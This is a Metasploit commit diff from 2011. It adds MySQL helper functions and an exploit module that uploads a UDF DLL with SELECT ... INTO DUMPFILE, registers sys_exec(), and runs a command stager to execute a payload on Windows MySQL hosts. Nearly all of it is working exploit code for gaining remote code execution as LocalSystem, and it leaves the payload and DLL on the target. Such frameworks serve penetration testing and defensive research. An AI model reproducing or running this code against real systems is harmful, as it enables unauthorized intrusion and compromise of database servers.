Fixes #3916. Adds a module for mysql delivery of a payload via a UDF, using Bernardo's quite excellent UDF libraries.

git-svn-id: file:///home/svn/framework3/trunk@11899 4d416f70-5f16-0410-b530-b9f4589650da
2011-03-08 22:42:26 +00:00 · 2011-03-08 22:42:26 +00:00 · 42531e097f
parent 54382c6080
commit 42531e097f
4 changed files with 231 additions and 1 deletions
--- a/data/exploits/lib_mysqludf_sys_32.dll
+++ b/data/exploits/lib_mysqludf_sys_32.dll
--- a/data/exploits/lib_mysqludf_sys_64.dll
+++ b/data/exploits/lib_mysqludf_sys_64.dll
--- a/lib/msf/core/exploit/mysql.rb
+++ b/lib/msf/core/exploit/mysql.rb
@ -66,10 +66,130 @@ module Exploit::Remote::MYSQL
 			print_error("MySQL Error: #{e.class} #{e.to_s}")
 			return
 		end
-
 		res
 	end

+	def mysql_get_plugin_dir
+		print_status "Checking for MySQL plugin directory..."
+		plugin_res = nil
+		base_res = nil
+		plugin_res = mysql_get_variable("@@plugin_dir") rescue nil
+		begin
+			res = mysql_query("show variables like 'basedir'") 
+			base_res = res.first[1] if res.respond_to? :first
+		rescue nil
+
+		end
+
+		if plugin_res.respond_to? :split
+			target_path = plugin_res.split(/[\x5c\x2f]+/).join("/") << "/"
+		elsif base_res.respond_to? :split
+			target_path = base_res.split(/[\x5c\x2f]+/).join("/") << "/bin/"
+		else
+			print_error "Cannot determine the plugin directory."
+			return false
+		end
+	end
+
+	def mysql_get_temp_dir
+		print_status "Checking for temp directory..."
+		res = mysql_get_variable("@@tmpdir")
+		if res.respond_to? :split
+			target_path = res.split(/[\x5c\x2f]+/).join("/") << "/"
+		else
+			print_error "Cannot determine the temp directory, exiting."
+			return false
+		end
+	end
+
+	def mysql_get_variable(var)
+		res = mysql_query("SELECT #{var}")
+		if res.respond_to? :first
+			return res.first.first
+		end
+	end
+
+	def mysql_upload_binary(bindata)
+		blob = "0x"
+		blob << bindata.unpack("C*").map {|x| "%02x" % [x]}.join
+		tmpdir = mysql_get_temp_dir
+		binname = Rex::Text.rand_text_alpha(8)
+		binpath = tmpdir << binname
+		print_status "Uploading binary as #{binpath}..."
+		res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'")
+		return res
+	end
+
+	def mysql_upload_sys_udf(arch=:win32,target_path=nil)
+		fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll")
+		sys_dll = File.join( Msf::Config.install_root, "data", "exploits", fname )
+		data = File.open(sys_dll, "rb") {|f| f.read f.stat.size}
+		blob = "0x"
+		blob << data.unpack("C*").map {|x| "%02x" % [x]}.join
+		dll_name = Rex::Text.rand_text_alpha(8)
+		target_dll = target_path << dll_name << ".dll"
+		print_status "Uploading #{fname} library to #{target_dll}..."
+		mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'")
+		return dll_name << ".dll"
+	end
+
+	def mysql_drop_and_create_sys_exec(soname)
+		mysql_query("DROP FUNCTION IF EXISTS sys_exec") # Already checked, actually
+		mysql_query("CREATE FUNCTION sys_exec RETURNS int SONAME '#{soname}'")
+		return true
+	end
+
+	def mysql_get_arch
+		print_status "Checking target architecture..."
+		res = mysql_get_variable("@@version_compile_os")
+		return :unknown unless res
+		case res
+		when /Win64/i
+			:win64
+		when /Win32/i
+			:win32
+		else
+			res
+		end
+	end
+
+	def mysql_add_sys_exec
+		arch = mysql_get_arch
+		case arch
+		when :win64,:win32
+			target_path = mysql_get_plugin_dir
+			if target_path
+				print_status "Target arch (#{arch}) and target path both okay."
+				soname = mysql_upload_sys_udf(arch,target_path) 
+				mysql_drop_and_create_sys_exec(soname)
+				return true
+			else 
+				print_status "Cannot determine an appropriate target path."
+				false
+			end
+		when :unknown
+			print_error "Cannot determine target's architecture"
+			return false
+		else
+			print_error "Target is an incompatible architecture: #{res}"
+			return false
+		end
+	end
+
+	def mysql_check_for_sys_exec
+		print_status "Checking for sys_exec()..."
+		res = mysql_query("select * from mysql.func where name = 'sys_exec'")
+		res.size == 1
+	end
+
+	def mysql_sys_exec(cmd,doprint=false,opts={})
+		res = mysql_query("select sys_exec('#{cmd}')")
+		if res && doprint
+			print_status "Executing: #{cmd}" 
+			return res
+		end
+	end
+
 end
 end

--- a/modules/exploits/windows/mysql/mysql_payload.rb
+++ b/modules/exploits/windows/mysql/mysql_payload.rb
@ -0,0 +1,110 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::MYSQL
+	include Msf::Exploit::CmdStagerVBS
+
+	def initialize(info = {})
+		super(
+			update_info(
+				info,
+			'Name'           => 'Oracle MySQL for Microsoft Windows Payload Execution',
+			'Description'    => %q{
+				This module creates and enables a custom UDF (user defined function) on the
+				target host via the SELECT ... into DUMPFILE method of binary injection. On
+				default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
+				permissions not enforced, and the MySQL service runs as LocalSystem.
+
+				NOTE: This module will leave a payload executable on the target system when the
+				attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
+				and sys_exec() functions.
+			},
+		'Author'         =>
+		[
+			'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
+			'todb' # this Metasploit module
+		],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+		[
+			# Bernardo's work with cmd exec via udf
+			[ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ],
+			# Advice from 2005 on securing MySQL on Windows, kind of helpful.
+			[ 'URL', 'http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html' ]
+		],
+			'Platform'       => 'win',
+			'Targets'        =>
+		[
+			[ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
+		],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
+		))
+		register_options(
+			[
+				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
+				OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
+				OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
+		])
+	end
+
+	def username
+		datastore['USERNAME']
+	end
+
+	def password
+		datastore['PASSWORD']
+	end
+
+	def login_and_get_sys_exec
+		mysql_login(username,password,'mysql')
+		@mysql_arch = mysql_get_arch
+		@mysql_sys_exec_available = mysql_check_for_sys_exec() 
+		if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
+			mysql_add_sys_exec 
+			@mysql_sys_exec_available = mysql_check_for_sys_exec() 
+		else
+			print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
+		end
+	end
+
+	def execute_command(cmd, opts)
+		mysql_sys_exec(cmd, datastore['VERBOSE'])
+	end
+
+	def exploit
+		login_and_get_sys_exec()
+
+		if not @mysql_handle
+			print_status("Invalid MySQL credentials")
+			return
+		elsif not [:win32,:win64].include?(@mysql_arch) 
+			print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
+			return
+		else
+			if @mysql_sys_exec_available
+				execute_cmdstager({:linemax => 1500, :nodelete => true})
+				handler
+			else
+				print_status("MySQL function sys_exec() not available")
+				return
+			end
+		end
+		disconnect
+	end
+
+end